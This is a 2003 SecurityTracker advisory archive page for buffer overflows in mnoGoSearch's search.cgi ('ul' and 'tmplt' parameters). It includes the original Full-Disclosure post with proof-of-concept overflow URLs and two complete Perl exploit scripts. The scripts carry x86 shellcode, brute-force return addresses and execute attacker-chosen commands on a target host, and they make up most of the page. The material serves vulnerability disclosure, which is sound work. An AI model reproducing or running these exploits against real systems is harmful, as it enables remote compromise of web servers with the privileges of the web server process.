SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   mnoGoSearch Vendors:   Lavtech.Com Corp.
mnoGoSearch Buffer Overflows in 'ul' and 'tmplt' Variables Permit Remote Code Execution
SecurityTracker Alert ID:  1006963
SecurityTracker URL:  http://securitytracker.com/id/1006963
CVE Reference:   CVE-2003-0436   (Links to External Site)
Updated:  Jul 28 2003
Original Entry Date:  Jun 10 2003
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 3.1.20, 3.2.10
Description:   Two buffer oveflow vulnerabilties were reported in mnoGoSearch. A remote user can execute arbitrary code.

SCAN Associates reported that a remote user can submit a URL with a specially crafted 'ul' variable of more than 5000 characters to trigger a buffer overflow and execute arbitrary code. The code will run with the privileges of the web server process. Version 3.1.20 is affected by this overflow.

A demonstration exploit URL is provided:

http://[target]/cgi-bin/search.cgi?ul=[6000]A`s

A demonstration exploit script (mencari_sebuah_nama.pl) is provided in the Source Message.

It is also reported that a remote user can supply a specially crafted 'tmplt' variable that is longer than 1024 characters to trigger a buffer overflow in version 3.2.10. Arbitrary code can be executed, according to the report. The code will run with the privileges of the web server process.

A demonstration exploit URL is provided:

http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s

A demonstration exploit script (mencari_asal_usul.pl) is provided in the Source Message.

The vendor was reportedly notified on June 1, 2003.

Impact:   A remote user can execute arbitrary code on the target server with the privileges of the web server process.
Solution:   A fixed version is available via CVS at:

http://www.mnogosearch.org/download.html

Vendor URL:  www.mnogosearch.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jul 28 2003 (Conectiva Issues Fix) mnoGoSearch Buffer Overflows in 'ul' and 'tmplt' Variables Permit Remote Code Execution
Conectiva has released a fix.



 Source Message Contents

Subject:  [Full-Disclosure] mnogosearch 3.1.20 and 3.2.10 buffer overflow


This is a multi-part message in MIME format.
--------------000202000101010506040301
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Products: mnogosearch 3.1.20 and 3.2.10 (http://www.mnogosearch.org)
Date: 06 June 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors:	sk_at_scan-associates.net
		shaharil_at_scan-associates.net
		munir_at_scan-associates.net
URL: http://www.scan-associates.net

Summary: mnogosearch 3.1.20 and 3.2.10 buffer overflow

Description
===========
*mnoGoSearch* (formerly known as *UdmSearch*) is a full-featured web
search engine software for intranet and internet servers..

Details
=======
There is buffer overflow vulnerabilities in mnogosearch 3.1.20 and 3.2.10.

1) Buffer overflow in "ul" variable in 3.1.20

"ul" variable is used to specify search result to specific url. By supplying
crafted "ul" variable more than 5000 user can write arbitrary address and
run command as web server user.

ex:
    http://blablabla.com/cgi-bin/search.cgi?ul=[6000]A`s

proof of concept
----------------
[see attachment: mencari_sebuah_nama.pl]

2) Buffer overflow in "tmplt" variable in 3.2.10
User can crash search.cgi by supplying "tmplt" variable over 1024 character.
This is stack base buffer overflow where eip can easily overwritten.

ex:
     http://blablabla.com/cgi-bin/search.cgi?tmplt=[1050]A`s

proof of concept
----------------
[see attachment: mencari_asal_usul.pl]

Vendor Response
===============
Vendor has been contacted on 01/06/2003 and fix is available from cvs at
http://www.mnogosearch.org.







--------------000202000101010506040301
Content-Type: application/x-perl;
 name="mencari_sebuah_nama.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="mencari_sebuah_nama.pl"

#!/usr/bin/perl
# 
# [ reloaded ] 
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, 
#	kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
#	#mybsd, #mylinux, #vuln
#
# Special thanks:
#	Skywizard of mybsd
#   
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1): 
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d' scan clanz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# generate shellcode



--------------000202000101010506040301
Content-Type: application/x-perl;
 name="mencari_asal_usul.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="mencari_asal_usul.pl"

#!/usr/bin/perl
#
# mnogosearch 3.2.x exploit for linux ix86
# by pokleyzz and s0cket370 of d'scan clanz
# 
# Greet: 
#	tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# Special thanks:
#	Skywizard of mybsd
#
# 
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#

use IO::Socket;

my $host = "127.0.0.1";
my $port = 80;
my $searchpath = "/cgi-bin/search.cgi";
my $envsize = 4096;
my $suffsize = 3;
my $rawret = "bfffd666";
my $ret;
my $cmd = "ls -l";
my $conn;

if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.2.x exploit for linux ix86 \n\tby pokleyzz and s0cket370 of d' scan clan\n\n";
	print "Usage: \n mencari_asal_usul.pl hostname [command ] [path] [port] [suff] [ret]\n";
	print "\t- if not success try to use 0,1 or 2 for suff (default is 3)";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = $ARGV[5];	
}

# linux ix86 shellcode rip from phx.c by proton
my $shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             ."\x41\x41"
             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
             ."$cmd"
             ."@";

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 6, 2)));
		$ret .= chr(hex(substr($rawret, 4, 2)));
		$ret .= chr(hex(substr($rawret, 2, 2)));
    		$ret .= chr(hex(substr($rawret, 0, 2)));
    		
	}	
	
}

sub connect_to {
	print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /\/test\//){
		print "[x] Correct version.. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] Old version or wrong url\n";
	}	
}

# start exploiting ...
sub exploit {

	# generate environment variable for http request
	$envvar = 'A' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query request
	$query = 'A' x $suffsize;
	$query .= $ret x 258;
	
	# generate request
	$request = "GET $searchpath?tmplt=$query HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	print "[x] Trying to execute command ... \n";
	print "[x] Return address : $rawret \n";
	print "[x] Suffix size : $suffsize \n";
	connect_to();
	print $conn "$request"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
	if ($result =~ /hello/){
		print $result;
	} else {
		print "[*] Failed ...\n";
	}
}



&string_to_ret($rawret);
&check_version;
&exploit;	


--------------000202000101010506040301--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC